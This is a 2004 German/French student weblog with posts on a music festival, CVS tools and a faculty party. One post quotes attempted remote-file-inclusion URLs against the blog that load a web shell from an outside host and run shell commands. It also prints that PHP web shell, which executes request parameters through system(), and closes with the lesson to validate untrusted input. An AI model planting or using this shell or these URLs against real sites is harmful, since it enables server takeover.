Sunday, 16. May 2004Week 19

XSS

http://waterwave.ch/weblog/detail.php?label=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;w
http://waterwave.ch/weblog/index.php?cat=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;w

Na, billige XSS-Attacke falsch angewendet.

In http://cliente.escelsanet.com.br/metallz/cmd.jpg steht übrigens dieser PHP-Code.

</center><font size="2"><pre>-
<?
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>

Merke: Immer alle nicht vertrauenswürdigen Input-Daten (e.g. alle per POST, GET, COOKIE übermittelten Daten) kontrollieren. Sehr oft werden hierzu Character type functions eingesetzt.

Balélec 2004

Le vendredi j'étais au Balélec et c'était vachement cool. 30 groupes sur 7 scènes pour 20 Francs, cela on ne trouve pas ailleurs.

On se voit l'année prochaine, au 25-ième Balélec!

Wednesday, 12. May 2004Week 19

v2.04b

Neue Features:
  • Kommentarvorschau
  • On-the-fly Sprachwechsel der Navigationselemente (Deutsch/Französisch)
Saturday, 8. May 2004Week 18

CVS

Momentan machen wir im Programmieren ein Projekt in Zweierteams. Um die ganze Codehandhabung zu vereinfachen, hat sich unser Team entschieden, CVS einzusetzen. CVS bietet eine zentrale Codeverwaltung mit Versions- und Konfliktsmanagement.

Da ich als CVS-Neuling das CLI-Interface nur grundlegend kenne, habe ich mich nach einem GUI-Interface umgeschaut. Dabei habe ich zwei überzeugende Programme gefunden: TkCVS und LinCVS, das auch auf Windows portiert wurde.

Sunday, 2. May 2004Week 17

Deadlock

Am Freitag feierte die Section d'Informatique ihr 20-jähriges Bestehen.
Zuerst mussten 90 Minuten Reden diverser Professoren und ehemaliger Präsidenten der EPFL überstanden werden. Da jeder Redner noch ein bisschen in der Vergangenheit schweifte, wurden aus den 90 Minuten 2 Stunden. Aber danach gabs ein Apéro mit einem fünfgängigen Menu.
Nachdem der offizielle Teil gebührend genossen war, gings ab zum Deadlock. Da die Section d'Informatique einen Frauenanteil von 6% hat, wurde das Deadlock mit dem Fest der Sciences Sociales et Politiques der UNIL (95% Frauenanteil) zusammengelegt :-)
So konnte der Rest des Abends einfach nur gut werden. Doch um 3 Uhr morgens waren auch die sechs Konzerte zuende und ich durfte noch fast ne Stunde nach Hause radeln...